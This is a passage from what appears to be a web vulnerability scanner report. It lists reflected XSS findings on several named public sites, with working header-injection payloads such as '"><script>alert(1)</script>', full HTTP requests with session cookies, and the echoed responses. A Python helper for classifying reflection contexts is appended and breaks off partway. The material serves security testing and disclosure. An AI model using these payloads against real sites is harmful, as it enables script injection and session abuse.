The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a189'-alert(1)-'64741e13be6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/vc_about.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;
Referer: http://www.google.com/search?hl=en&q=6a189'-alert(1)-'64741e13be6

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 14758
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:12 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
_country";

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: virus scan: about';

   var strReferrer = 'http://www.google.com/search?hl=en&q=6a189'-alert(1)-'64741e13be6';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...

4.238. http://security.symantec.com/sscv6/vc_about.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/vc_about.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 90029<script>alert(1)</script>6a17c3c3905 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/vc_about.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: 90029<script>alert(1)</script>6a17c3c3905
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11484
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:09 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
<i>90029<script>alert(1)</script>6a17c3c3905</i>
...[SNIP]...

4.239. http://shop.ca.com/cgi-bin/ShoppingCart.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d69e"><script>alert(1)</script>720f70e7524 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; SessionId=1310349220110417085445173193214243; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.1.10.1303044886
Referer: http://www.google.com/search?hl=en&q=1d69e"><script>alert(1)</script>720f70e7524

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:59:02 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:59:02 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=WEBSEO1; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&PHRoutine=10&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15844

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=1d69e"><script>alert(1)</script>720f70e7524">
...[SNIP]...

4.240. http://shop.ca.com/cgi-bin/order.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 723f6"><script>alert(1)</script>f15dc6132d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;
Referer: http://www.google.com/search?hl=en&q=723f6"><script>alert(1)</script>f15dc6132d3

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:54 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:55 GMT
Content-Length: 16188
Connection: close
Set-Cookie: Cart=PHPromo=N&PHRoutine=10&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=WEBSEO1; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=723f6"><script>alert(1)</script>f15dc6132d3">
...[SNIP]...

4.241. http://theautomaster.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eec29"><script>alert(1)</script>ab2b3c3131d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=eec29"><script>alert(1)</script>ab2b3c3131d

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 01:21:31 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ssoid=610c5daf0a0a002d004d9ebfb4592aff;path=/
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: JSESSIONID=1ts7yo8wpkkrt;path=/
Set-Cookie: lbpoolmember=1711345162.40475.0000; path=/
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Set-Cookie: ddcpoolid=CmsPoolE;path=/;
Content-Length: 44186

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=eec29"><script>alert(1)</script>ab2b3c3131d&amp;20=theautomaster.com&amp;21=/index.htm&amp;50=610c5daf0a0a002d004d9ebfb4592aff&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&a
...[SNIP]...

4.242. http://theautomaster.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f244'-alert(1)-'7c9cfbad8fc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=2f244'-alert(1)-'7c9cfbad8fc

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 01:21:40 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ssoid=610c81c60a0a002d004d9ebf68559dc3;path=/
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: JSESSIONID=2t37vs2p32d2d;path=/
Set-Cookie: lbpoolmember=1711345162.40475.0000; path=/
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Set-Cookie: ddcpoolid=CmsPoolE;path=/;
Content-Length: 44156

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=2f244'-alert(1)-'7c9cfbad8fc',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...

4.243. http://theautomaster.com/index.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6ba0"><script>alert(1)</script>b57f39e8c6e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=e6ba0"><script>alert(1)</script>b57f39e8c6e

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 17:03:30 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ssoid=5f446ba50a0a002d004d9ebfd5c87dbe;path=/
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: JSESSIONID=82plfcqst74p5;path=/
Set-Cookie: lbpoolmember=1711345162.40475.0000; path=/
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Set-Cookie: ddcpoolid=CmsPoolE;path=/;
Content-Length: 44186

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=e6ba0"><script>alert(1)</script>b57f39e8c6e&amp;20=theautomaster.com&amp;21=/index.htm&amp;50=5f446ba50a0a002d004d9ebfd5c87dbe&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&a
...[SNIP]...

4.244. http://theautomaster.com/index.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ddc8'-alert(1)-'4ac342c68e7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=7ddc8'-alert(1)-'4ac342c68e7

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 17:03:34 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ssoid=5f447ce10a0a002d004d9ebfaaa376e2;path=/
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: JSESSIONID=2n1t92d733bwk;path=/
Set-Cookie: lbpoolmember=1711345162.40475.0000; path=/
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Set-Cookie: ddcpoolid=CmsPoolE;path=/;
Content-Length: 44156

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=7ddc8'-alert(1)-'4ac342c68e7',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...

4.245. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload f4f87<script>alert(1)</script>06934d90575 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f4f87<script>alert(1)</script>06934d90575

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94445

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
</script>06934d90575";addthis_title="f4f87<script>alert(1)</script>06934d90575 - 1 search";
var services = { 'naszaklasa':"Nasza-klasa", 'tuenti':"Tuenti", '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97a
...[SNIP]...

4.246. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea62e"><script>alert(1)</script>30ad732db68 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ea62e"><script>alert(1)</script>30ad732db68

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94463

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=ea62e"><script>alert(1)</script>30ad732db68" />
...[SNIP]...
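
The scanner's verdicts in this section ("copied into the value of an HTML tag attribute which is encapsulated in double quotation marks", "echoed unmodified") can be reproduced offline from a captured response. The Python below is an added example written for this page, not code from the report or from Burp Suite: given a response body and a probe split into its random prefix, the metacharacter payload and its random suffix, it locates every echo, classifies the surrounding context with a simplified backward scan (HTML comment, string literal inside `<script>`, quoted attribute, plain text) and reports whether the metacharacters survived verbatim. The sample bodies are constructed from the fragments quoted in findings 4.246, 4.247, 4.251 and 4.252, plus one entity-encoded variant; the classifier ignores CDATA, escaped quotes inside attributes and nested template syntax, which is enough for these responses but is not a general HTML tokenizer.

```python
import re


def _quote_state(text: str, backslash_escapes: bool):
    """Return the quote character of an unterminated quoted run at the end of `text`,
    or None. JS string literals honour backslash escapes; HTML attribute values do not."""
    quote = None
    i = 0
    while i < len(text):
        c = text[i]
        if quote:
            if backslash_escapes and c == '\\':
                i += 1          # skip the escaped character
            elif c == quote:
                quote = None
        elif c in '"\'':
            quote = c
        i += 1
    return quote


def context_at(before: str) -> str:
    """Classify the context at the end of `before`, the markup preceding a reflection.
    Simplified backward scan, not a full HTML tokenizer (assumption: no CDATA, no
    '<!--' inside script bodies)."""
    if before.rfind('<!--') > before.rfind('-->'):
        return 'html_comment'
    low = before.lower()
    open_script = low.rfind('<script')
    if open_script > low.rfind('</script'):
        code = before[before.find('>', open_script) + 1:]   # script body so far
        q = _quote_state(code, backslash_escapes=True)
        return {'"': 'js_string_dq', "'": 'js_string_sq', None: 'js_code'}[q]
    if before.rfind('<') > before.rfind('>'):
        tag = before[before.rfind('<') + 1:]               # inside an open tag
        q = _quote_state(tag, backslash_escapes=False)
        return {'"': 'attr_dq', "'": 'attr_sq', None: 'tag_unquoted'}[q]
    return 'html_text'


def classify_reflections(body: str, prefix: str, meta: str, suffix: str):
    """Locate every prefix...suffix echo in `body`. An echo counts as 'unmodified'
    only when the bytes between the markers equal the submitted metacharacters."""
    pattern = re.compile(re.escape(prefix) + '(.*?)' + re.escape(suffix), re.DOTALL)
    findings = []
    for m in pattern.finditer(body):
        observed = m.group(1)
        findings.append({
            'context': context_at(body[:m.start()]),
            'observed': observed,
            'echoed_unmodified': observed == meta,
        })
    return findings


# Constructed sample bodies, trimmed down from the fragments quoted in findings
# 4.246, 4.247, 4.251 and 4.252 of this report, plus one entity-encoded variant.
SAMPLE_ATTR = (
    '<html><body><form>'
    '<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q='
    'ea62e"><script>alert(1)</script>30ad732db68" /></form></body></html>'
)
SAMPLE_JS = (
    '<html><head><script type="text/javascript">'
    'addthis_url="http://www.google.com/search?hl=en&q=ece2b%2522%253balert%25281%2529%252f%252fc7db6d31527";'
    'addthis_title="ece2b";alert(1)//c7db6d31527 - 1 search";'
    '</script></head></html>'
)
SAMPLE_JS_SQ = (
    "<script>var tracking = { sessionReferrer: 'http://www.google.com/search?hl=en&q="
    "5183d'-alert(1)-'57160338b5', refId: '' };</script>"
)
SAMPLE_COMMENT = (
    '<html><head><!--Cart(Referer) :http://www.google.com/search?hl=en&q='
    'f0c0c--><script>alert(1)</script>ab07c28887--></head></html>'
)
SAMPLE_ENCODED = (
    '<input type="hidden" name="url" value="ea62e&quot;&gt;&lt;script&gt;alert(1)'
    '&lt;/script&gt;30ad732db68" />'
)

if __name__ == '__main__':
    for name, body, prefix, meta, suffix in [
        ('4.246', SAMPLE_ATTR, 'ea62e', '"><script>alert(1)</script>', '30ad732db68'),
        ('4.247', SAMPLE_JS, 'ece2b', '";alert(1)//', 'c7db6d31527'),
        ('4.251', SAMPLE_JS_SQ, '5183d', "'-alert(1)-'", '57160338b5'),
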